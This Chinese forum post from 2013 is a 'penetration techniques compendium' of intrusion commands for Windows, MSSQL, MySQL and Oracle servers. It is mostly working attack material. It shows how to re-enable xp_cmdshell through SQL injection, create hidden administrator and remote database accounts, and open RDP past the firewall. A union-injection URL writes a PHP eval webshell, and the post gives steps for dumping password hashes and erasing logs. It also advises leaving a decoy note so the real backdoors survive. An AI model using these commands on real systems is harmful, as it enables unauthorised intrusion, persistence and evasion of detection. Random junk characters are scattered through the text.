中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

6 v. r, c6 ^3 r4 S1.net user administrator /passwordreq:no
1 G' D4 s& J0 M/ {1 B- G这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了% x, u# _" k% w% P' J( J
2.比较巧妙的建克隆号的步骤
. |& W6 x- \2 p3 Y- w# B9 Q先建一个user的用户
: d& I& }6 V9 t1 Q然后导出注册表。然后在计算机管理里删掉
7 N7 ?5 L' L* d( U0 ?7 w4 Z* N在导入,在添加为管理员组* t9 Q, B# ?, v0 P: o
3.查radmin密码) b$ X% u) P0 Y: G* p- B
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg( v1 R3 n* l  }: U
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]' O6 l/ H+ e0 O! k
建立一个"services.exe"的项
5 ~# M  K" l4 V6 j6 |再在其下面建立(字符串值)
# r* ^+ N8 v8 g键值为mu ma的全路径
& J8 T- N- j* i5.runas /user:guest cmd  `& a: |2 \' c# {3 p  [  B4 X
测试用户权限!
+ W9 L. s% h& G6 w6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
/ {& X' X/ w) v: r) k7.入侵后漏洞修补、痕迹清理,后门置放:: k2 q% T" u$ C  H2 Q
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门) ^6 V/ H0 b) Z+ N0 a0 S
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
3 G# n& s* l+ N9 O. W& r! j3 O. M
for example
4 O3 o% z% g* t& F1 Z9 R
; e1 K+ G, k; z& @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
2 N8 Y3 T, w8 h" b# ]# Z( t
+ N% {2 T- G6 t4 q, q8 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
  u* D+ \, _. P' R" q5 e, v! b9 ^. C6 y3 o6 z
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
0 A# ?& T' a5 w如果要启用的话就必须把他加到高级用户模式
6 _% W6 X. C1 P- e) ^  z/ t可以直接在注入点那里直接注入1 J! e2 e- d8 z
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 D2 Q; O* z. U& X
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--2 ?' A3 F+ Q8 `" F
或者9 [! \' E& E+ e
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'6 }" p+ \- T: s2 o' _. k8 Z- e- o
来恢复cmdshell。+ j8 [2 _5 D% m
2 o5 N5 a  o5 a4 Y9 d) I# Q: c' f
分析器
$ e8 n: R& C4 D8 s2 vEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
' {8 U0 E! X. i& i& F: ~然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 W# Q' r* f7 v4 b( s) r
10.xp_cmdshell新的恢复办法
# |+ a( S" x/ `& x% {xp_cmdshell新的恢复办法
6 Q5 w' X/ k' [9 f; D  A扩展储存过程被删除以后可以有很简单的办法恢复:1 B% h; V4 l2 @: E2 x
删除2 K- P4 ~& H- I9 W  e! s4 ?4 _* N
drop procedure sp_addextendedproc) O6 K6 {7 H: o7 Q
drop procedure sp_oacreate
  O  c5 Z/ p, H8 G8 w! g2 ?! f4 Mexec sp_dropextendedproc 'xp_cmdshell'5 B$ [* N* o9 a( i/ a: A
, z$ O6 d% t  t& H
恢复
1 g" b1 ?% Y0 ]) ~: Tdbcc addextendedproc ("sp_oacreate","odsole70.dll"). A! ]/ m3 T/ \! V/ G2 z$ V" i
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
0 B0 |3 ^, z9 @9 G: F# G: b6 }* T0 W" R
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
; @) [' c/ Z, r9 O6 L. H$ @2 j( q/ a+ P2 [- q+ Z
-----------------------------/ t# v0 y4 H" B1 q# [

8 I0 X7 `+ v) h; V+ z; f  [0 u删除扩展存储过过程xp_cmdshell的语句:9 l7 L2 ]  l  w9 w
exec sp_dropextendedproc 'xp_cmdshell'
* r; }" D( ~* G# F; o# H9 S4 ~( V: x( i" O
恢复cmdshell的sql语句
. g) ~7 f1 A' Y3 jexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
  p  q4 Y5 F( O- z; S/ q: l  `8 R  L: R9 P
5 q  A6 L* W" u. }! z2 x( q
开启cmdshell的sql语句
& i; h& T1 X. }# h
5 i6 \( ~7 ^* Cexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
: F4 b) b8 u4 c  y+ B% ~+ n( t# }4 b' }9 k. ]
判断存储扩展是否存在
; I  }- r$ a; q6 x0 Aselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
( K! E- m* u  {3 c( X* M5 O返回结果为1就ok) _4 X8 t/ @$ d- ~! Y( P

: I  t. X" L! r" U: L( I恢复xp_cmdshell; n& j  u$ K1 U7 ?! D2 ]$ ~0 _% v
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. W) K: d& F7 m- R返回结果为1就ok
8 \. N6 w* T2 M5 J, d2 b
  i/ E* L2 y6 J: c否则上传xplog7.0.dll0 ]" `  F2 E# V& R' I. a0 Q
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
. U, p4 P9 @$ @7 c  b
7 a+ f6 K% x; s8 w堵上cmdshell的sql语句
- g  b; F2 t9 D" Xsp_dropextendedproc "xp_cmdshel
1 k7 F" h; m# T3 X-------------------------; `* ]; |  i$ P$ R9 A- D" f
清除3389的登录记录用一条系统自带的命令:
2 _( M% }& O# k2 [: y8 U: Ereg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f: J7 v  J/ i% k
+ [: b& r0 E4 S8 H
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
; N0 R( Y4 h2 r6 G- g$ ?在 mysql里查看当前用户的权限
- ?2 ^$ z; L2 `( _3 d  Z5 ^7 w! `+ [* sshow grants for  
2 P( s( n/ c5 D/ p8 A) z" _( o9 ?: b6 I- [! G2 \: {$ v) Z
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。8 i# i4 [2 ~" V" u# M

; e. J+ p, y- f8 F2 r+ G; Y8 x% f1 M6 ~$ B' Q- K3 q
Create USER 'itpro'@'%' IDENTIFIED BY '123';
% J9 R7 x8 g6 q! E4 p
1 O- v3 c. g% Q- d6 L( r2 fGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION) R; ^; a# r5 ]

7 w- V9 N! N5 z. t2 a' q! MMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0$ F9 Q& d8 P4 }: p. W
' a  [6 c7 b) |0 b0 D% Z% }
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;1 r+ U$ g& c! `7 ^- K$ F$ U1 k

1 m" c' G1 Z6 W4 Q% T搞完事记得删除脚印哟。
/ R# k$ F% b* S: p
3 s8 ~, r. B7 R$ Q& L" c- ^Drop USER 'itpro'@'%';1 H$ r1 I# T5 W0 T9 _8 J  P- R
/ q5 i% {3 Y* v% W* |: G
Drop DATABASE IF EXISTS `itpro` ;& ^( j! f$ @; w9 x/ `
; P4 _, H2 x0 H6 j1 r& y. O
当前用户获取system权限9 u4 X3 |3 K5 S, j# B% S1 A
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact( U/ b  s/ _7 ~. J# U  G
sc start SuperCMD5 B8 R1 E0 O# h1 @
程序代码
! _9 _8 W8 ?; e# U+ T<SCRIPT LANGUAGE="VBScript">
  M1 x  W' X3 }$ o# yset wsnetwork=CreateObject("WSCRIPT.NETWORK")% P. t) T1 `# G" G; n4 G' c6 A2 V; R
os="WinNT://"&wsnetwork.ComputerName
4 P( o" A7 s4 a3 o! N; uSet ob=GetObject(os)
: e' C. a0 }& I/ [( l0 v5 O4 O$ KSet oe=GetObject(os&"/Administrators,group")! v2 E5 n( k6 J" }' o5 u, B
Set od=ob.Create("user","nosec")1 \2 s* C4 U, V3 s
od.SetPassword "123456abc!@#"
5 w- @' R9 Q, V8 Z0 ^  r1 P; h/ Qod.SetInfo
4 r: x$ t# J" _' O% H' F1 I' \Set of=GetObject(os&"/nosec",user)
( d" j) o) @( m5 T! p1 ioe.add os&"/nosec"% C2 z* Q4 o, a8 i$ u; l- l
</Script>7 L8 \  m" B: A' x; z
<script language=javascript>window.close();</script>  H* f  ~  b) ]( _5 X# d! y

- a% N  V* ^9 I9 i+ x5 e( K. x
2 K% t0 w! W& C; d4 D2 ~6 H0 `# O1 n, ~
/ s4 d  Q* f4 E# @+ U: ?  a( u2 k
突破验证码限制入后台拿shell* l0 V, I) d8 D: j5 C7 ~7 S
程序代码+ A$ U$ d3 c! [+ e3 z
REGEDIT4
2 y3 L0 P! w/ x5 U3 [5 T; l[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
2 l" u& ^- w" x"BlockXBM"=dword:000000007 k4 F5 E. C7 T# j: ?2 U9 P4 `

" q1 o7 J8 z+ _# J2 ]保存为code.reg,导入注册表,重器IE
/ T/ d' g# ^+ O3 z1 [8 Q就可以了
  k5 z* e& I* Q- d+ @' U* D5 |union写马
. ?' d7 |3 D5 N. k8 U% X% {程序代码# {2 T9 A7 w6 ?* S- ]
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
/ m% U/ W( q* Y. `3 w3 S
4 [% F, }% L; R+ P2 I% a) R6 {应用在dedecms注射漏洞上,无后台写马/ n. X; k8 Z) n8 F  w
dedecms后台,无文件管理器,没有outfile权限的时候- B/ L! Y: b  p* B$ i
在插件管理-病毒扫描里
: c) `6 w5 B: f3 r/ `写一句话进include/config_hand.php里2 h, z: O" @. |" f2 j
程序代码
. h1 _0 V/ O# Q% b2 k$ a>';?><?php @eval($_POST[cmd]);?>
- C# Y9 q4 ]# D& N4 C* e+ m- m7 D; W3 J) q8 u

: f* u/ ?- [* r: Z5 e) L4 O7 t4 C  j如上格式
! Y. n% R; R2 c1 Y# x
, d3 {. y: L6 G0 P. b% voracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
  o- X; U0 X( H6 @6 F程序代码
( i8 l* ~; Q% u# ?select username,password from dba_users;
8 i, K  C. b& ~: u- S& f2 W9 W7 x* s2 E# E4 B- o

, z3 t2 o/ m6 F) ?5 ~( D3 W$ Imysql远程连接用户1 Y- I7 G; [1 G/ v* k7 H  L
程序代码% l& C& C, _: K' g$ ]

! C. e+ z4 C; }' {& RCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';! T% F% w6 Q1 H: Q5 p# d9 ~
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION8 q, [8 X( Z- A) Z1 A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
7 m$ r+ w: n& {. T9 `MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;3 v: k0 E5 x5 f) d" R/ d

8 {% i4 A) t! x. P* e: R1 |$ l4 Y, y9 [0 I" F$ r
8 u* O  s- \( l4 U/ X
) L. N5 G, S2 C8 v
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0! H4 ]0 T6 X  Z7 w: i
& j% A% y0 }6 ?" B+ p
1.查询终端端口+ Y' l9 l0 e6 h3 P: F2 M
/ h* k* N' B. |7 Z, o/ w
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2 y9 d  T# J. ^8 t
  e4 i  j# b6 N0 s* G
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"( o* J! [6 M! k2 e: b2 n* E
type tsp.reg6 y+ S( `6 J/ v; A0 P" ?& C
& |9 [5 M" M" E. Y' u
2.开启XP&2003终端服务
) l# D; r% S" d. A- ^$ l$ X: L8 n4 t+ e( e6 Q* x
! m3 j) J3 ]: \+ q$ R" N& z8 \: z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f: J( I8 a" x1 X6 _6 C2 `, V+ ~

$ K& c: l( t/ w
/ e3 Y  q5 w# x3 Y8 K& P  AREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f0 P: f4 u2 y- s; j$ V$ @: Y8 u6 x
% [# o6 |! _! F# |6 z' }
3.更改终端端口为20008(0x4E28)8 C; y+ A8 F5 Q  O, D+ U( s
6 {4 L7 S! s- p. Q  l- _7 z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ y# b: Z; }( d; H4 _
# k7 h% X9 c2 W* U/ _* ^" M$ F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f9 j: X6 @" x6 e" t

% J) \7 ~9 E( `4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制1 {( L" d: d) F1 w1 ]2 C8 C& i
+ [  t$ w# M% [9 X9 b
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f4 V* O1 A( j6 A6 u+ q, I# B

. Q& @; b: x% b9 U$ l, o( Y9 U! s
5 o* \3 y; w2 o4 t5.开启Win2000的终端,端口为3389(需重启)) R" v, E4 j6 B) |

) I" w: I  Q5 p* gecho Windows Registry Editor Version 5.00 >2000.reg
9 E4 o7 _( ~1 P$ V; k9 Z6 i- Mecho. >>2000.reg
7 U" F' s4 ]- E' R2 [* i  secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg " @2 W+ ~) |0 D, c6 j- Z
echo "Enabled"="0" >>2000.reg ; O% {5 `0 [$ t* d' X7 L7 Y) m! h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
' D9 N$ A( u5 V* [9 eecho "ShutdownWithoutLogon"="0" >>2000.reg 6 o$ k  z! n% ?1 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
; C* X8 @: _+ Q9 `echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
  l! q" l8 ~) O, {& E" g+ @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% L* X% X" b! G  |) Iecho "TSEnabled"=dword:00000001 >>2000.reg 3 U7 `9 A' i3 n& K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg " r7 n8 ^4 `0 p
echo "Start"=dword:00000002 >>2000.reg
8 k1 h5 R' w" s1 `! N2 |5 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
5 v' A4 K( x3 @echo "Start"=dword:00000002 >>2000.reg
2 }  ~3 t4 k* B+ W- Mecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 1 C2 V, w, ^+ K0 {+ N
echo "Hotkey"="1" >>2000.reg
  _% g; J' q- C9 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
& S* u, @# u  J  i# X( q0 G  |echo "ortNumber"=dword:00000D3D >>2000.reg 1 ~6 u' l$ u5 e0 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
# p3 j9 c3 G: X8 I/ L- Hecho "ortNumber"=dword:00000D3D >>2000.reg
6 V- g, x1 F; m: H' ]+ R7 N3 K% \- I9 h* s# f: `& T3 n8 z
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% X" |, a# @9 ^( L3 N
9 U3 f5 _( X& p/ h@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
# d8 }/ L2 [" z2 a(set inf=InstallHinfSection DefaultInstall)
4 }% t5 ]2 [- Q6 cecho signature=$chicago$ >> restart.inf
* f; U+ Q) V& [2 x( C7 [9 Necho [defaultinstall] >> restart.inf
( L6 o' I, g. drundll32 setupapi,%inf% 1 %temp%\restart.inf
3 y* G2 X' r8 b% p6 @3 U( x3 @6 `8 I- m+ i7 u, S3 z7 F6 Z! ^& [( `

5 K/ b3 E" o8 Q  D2 f7.禁用TCP/IP端口筛选 (需重启). r* l. y( H$ Z0 x, M( S
9 Y: r/ V- g8 ~+ H3 C$ I
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
. _1 i3 q9 U% P5 d$ W% |0 I; l
7 ]' V$ i2 _6 U$ y- b8.终端超出最大连接数时可用下面的命令来连接
! j2 g8 d9 G1 M( L/ M+ E$ M+ n$ W: A& H' {, `6 R& [2 Y* h
mstsc /v:ip:3389 /console
2 _# Y' \  B+ \: a2 g. [  `. v1 ?6 s# L/ n, a# R4 g# `) p
9.调整NTFS分区权限: f+ o6 _1 K7 f8 B& p, L
3 i" {. E! Z$ _$ d  [9 F0 Z- a
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利); y0 O5 Y0 z# w/ E
, o  V% Q% E4 N5 S* Z- R$ d
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
; x) q* j) \  I( H7 O, ]1 b4 H9 F$ G' M
------------------------------------------------------
/ Z  Z; b+ R  e0 B3389.vbs ! V# h' n1 f9 b5 u9 p
On Error Resume Next2 P7 E  X; l& Q) @) D' w
const HKEY_LOCAL_MACHINE = &H80000002
- a7 K% a! r: wstrComputer = "."
; }' s( F- p! e* J  ~. d7 d8 a5 HSet StdOut = WScript.StdOut
$ ^2 b" C3 A' _. A# _! M7 ]+ @Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_- b2 y! W5 O6 a+ \8 {
strComputer & "\root\default:StdRegProv")6 k. `4 u2 H4 V8 ?, |; k7 ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"% L# W0 h9 _. z6 ~* O/ }4 {% ]) a
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath7 ]0 \& [9 o; k7 T2 A9 G7 y* J
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 s1 W. {4 t1 C* P1 F% M# yoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath, z6 V  E8 E! B$ K  g; {, z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
6 j9 d6 W+ ^8 ^( s8 v5 z7 c; v+ estrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server". z6 H% `$ W; L. y+ T
strValueName = "fDenyTSConnections"3 G* ]1 z+ T; `; O/ {
dwValue = 0, m- L: X. r; \  i( u3 Q
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
7 B$ q, A, L7 E2 `$ fstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"* ~, ]* V' F( e6 `7 _' Q8 |
strValueName = "ortNumber"# b$ N( n  |5 J
dwValue = 33898 Q% ?. x- A- y3 ?- D3 M7 O4 V
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, g! `& B' N% ~. ]+ A& MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
, @! V- t; s" W) L4 z6 J; w. FstrValueName = "ortNumber"
; r7 f0 `6 G& w' N2 h  jdwValue = 3389
9 S. Y9 d" E' I; t% K) M) zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  M) |& D9 }( X8 k4 ?3 s
Set R = CreateObject("WScript.Shell") & P) q. U! T7 @' [0 q* o, s1 {
R.run("Shutdown.exe -f -r -t 0")
9 @7 j' C; w+ }7 S2 ^# H1 y$ C" [. |) U# g8 O4 j$ q. [
删除awgina.dll的注册表键值) ^2 \( B! G5 u$ o5 o7 P3 V2 D9 W. |' h, l
程序代码4 f  B' p4 k! {& K. I8 B# w, j
5 a1 ?6 d5 C- r7 {; W1 M( W9 u$ N
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f5 J& f$ M4 T8 ^4 ]

2 j; W9 ]7 L6 G* T( K* P) y6 o3 N: H( ^% D, d' I

) i3 `' ~* Q$ |, l  m, Q8 p" C8 B3 h/ l3 D" g: H( {. f
程序代码
& C$ _! i( o7 k3 y, Q1 PHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash! Q* @7 M1 L" L9 x; R0 _. F4 o: a$ {

6 ?: N6 Q1 k& K% n0 T9 U设置为1,关闭LM Hash  M" e4 H# E6 T# A" c

0 |1 K! R# j0 _! ]6 g1 i数据库安全:入侵Oracle数据库常用操作命令
/ I1 G* i* M+ K最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
. C7 B: ?# H1 M% P: U. m) X8 Q1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
9 p- a1 O1 D; V& k/ [2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;. \# Z# [6 I, Z
3、SQL>connect / as sysdba ;(as sysoper)或  Y7 G4 G/ O6 a4 [# N% F& f
connect internal/oracle AS SYSDBA ;(scott/tiger)
& M. U( S: L$ ]$ aconn sys/change_on_install as sysdba;! {4 j/ A  B4 B/ r% C. C
4、SQL>startup; 启动数据库实例$ p% B* ^) p% Y( G& {  I
5、查看当前的所有数据库: select * from v$database;
0 x$ O4 j# Q8 J4 p* I1 ^select name from v$database;) m. J7 u. J3 X3 [6 l( a
6、desc v$databases; 查看数据库结构字段0 D# e* B5 E% N, ]$ s$ E0 q
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:' G, w# O+ T* Q' k- b! T
SQL>select * from V_$PWFILE_USERS;
# N6 j1 e! n6 UShow user;查看当前数据库连接用户
* \' ^* h: X+ w) |$ ]. ]8、进入test数据库:database test;
. J6 h) P( q; i# N" y: t9、查看所有的数据库实例:select * from v$instance;+ F: {* p" j4 \2 _# _( X
如:ora9i
5 Y; |. [+ u& x10、查看当前库的所有数据表:% K4 ^; N6 H, @7 E4 C
SQL> select TABLE_NAME from all_tables;% K6 d- m% p+ m5 M) W9 O
select * from all_tables;1 B# C- W$ N+ X6 V$ o3 L7 p
SQL> select table_name from all_tables where table_name like '%u%';
% }6 E* H4 z. c. l, A4 C6 i! k; p/ p  hTABLE_NAME. c' C  n  D3 f! \' k# X
------------------------------
* W/ ]5 _$ ^* @8 o6 [0 a9 }/ g& Y_default_auditing_options_" q8 J/ L0 U( o! d: a, q( U
11、查看表结构:desc all_tables;
$ G# X/ o2 L' w' e12、显示CQI.T_BBS_XUSER的所有字段结构:
  C/ y5 f* V+ {0 P6 Gdesc CQI.T_BBS_XUSER;" N$ D! w+ b: f2 L2 C- ~
13、获得CQI.T_BBS_XUSER表中的记录:
2 g1 \1 D( M. ?8 J$ vselect * from CQI.T_BBS_XUSER;# O0 T. I4 [: f1 z7 u
14、增加数据库用户:(test11/test)
4 [* I5 a- y9 C" o6 O, \8 x8 Bcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
# Q5 I: T. O6 y15、用户授权:
8 `; p) t0 I4 p- w9 u, o/ M' z/ u! Ugrant connect,resource,dba to test11;
  K; e2 r9 j( O, Y& }% rgrant sysdba to test11;
3 C% L, @, Z- E$ w8 I7 A$ vcommit;1 G+ w% M8 ^: ^" W, {& A% S% e) c
16、更改数据库用户的密码:(将sys与system的密码改为test.)
  s* [: P+ F+ G, y4 E) zalter user sys indentified by test;' L# Q1 x2 l: ]( p" D9 {: g  `3 `9 U
alter user system indentified by test;
8 ~8 L# a6 a) V# P7 z6 k7 x% d* L) A1 J/ T  }
applicationContext-util.xml
- ^# F) q  A6 x& q3 z3 |applicationContext.xml% T& B9 U) [1 }5 o9 t) F+ c
struts-config.xml. [* o; t& @2 T
web.xml
  i9 ?5 |# p& Y( \) vserver.xml
% \2 t' r- n2 m' Ltomcat-users.xml
! v3 q2 E9 s) w8 d8 d  |hibernate.cfg.xml6 Y9 ^: D1 Y7 V. |$ Q9 u- C4 [
database_pool_config.xml
& @" D% M5 M+ x& e) E6 V0 s! z0 v# o

7 D& q; @4 K* \0 S\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置" g% j% K( f# }  i
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini1 M* N, |4 A4 P" R9 V6 E8 j3 n1 F
\WEB-INF\struts-config.xml  文件目录结构
/ ^0 S# _2 }4 s! Z9 m: ^: ~' z1 F) Q: O$ |  i  P
spring.properties 里边包含hibernate.cfg.xml的名称
' O( q" B0 }+ x1 A; w; x. M" a6 X# a2 G* B& I4 ~" ]
/ f) n8 G! L8 Z# N" l
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
- `) G/ w0 |5 k8 K  s3 Q' p0 p4 w0 J$ Z
如果都找不到  那就看看class文件吧。。$ Y4 G/ r+ L- `2 x4 {# y
5 p, m4 \9 _5 d$ b' U1 q
测试1:+ M3 J9 E6 I. U4 |& y
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1% Y& G0 g5 {3 H+ v1 C
& Q$ x  A$ o9 y' o% ^; v8 Z
测试2:
6 m2 Q8 B8 \5 H! l/ J9 q4 V% y' s5 i5 P. E  o. M
create table dirs(paths varchar(100),paths1 varchar(100), id int)
7 r) f! R! A! L4 C/ q& G/ b
8 [! j4 i0 I% W. H- e+ j4 qdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
  t& {7 t( ~, D+ v8 u/ u/ B' A  |9 \  q! h$ F" K
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
: O" b% u; f* g4 ]( ~! m7 p$ c8 [1 t) Q' K+ a5 @
查看虚拟机中的共享文件:
' H9 E  I& ~( [- N& [- d在虚拟机中的cmd中执行
% y" |% @7 E9 X) D\\.host\Shared Folders: y% q+ q' A% Y, J8 U

/ @2 H5 h' |- n/ q- k( _4 Tcmdshell下找终端的技巧5 K; G/ a6 K# r. z  \2 x& z) w2 k0 I
找终端: % _1 r% \# ~4 E  t! v& [- ^+ B
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
0 I, V3 \. \/ F. V; P   而终端所对应的服务名为:TermService
  ~" d( T& b: F, I2 S% J第二步:用netstat -ano命令,列出所有端口对应的PID值!
* n3 h: z% X) {! U   找到PID值所对应的端口/ c5 N3 V' H1 D" a: s

6 D; s# Q, S  M; g# e$ Q0 S查询sql server 2005中的密码hash/ s/ E3 i3 }. E
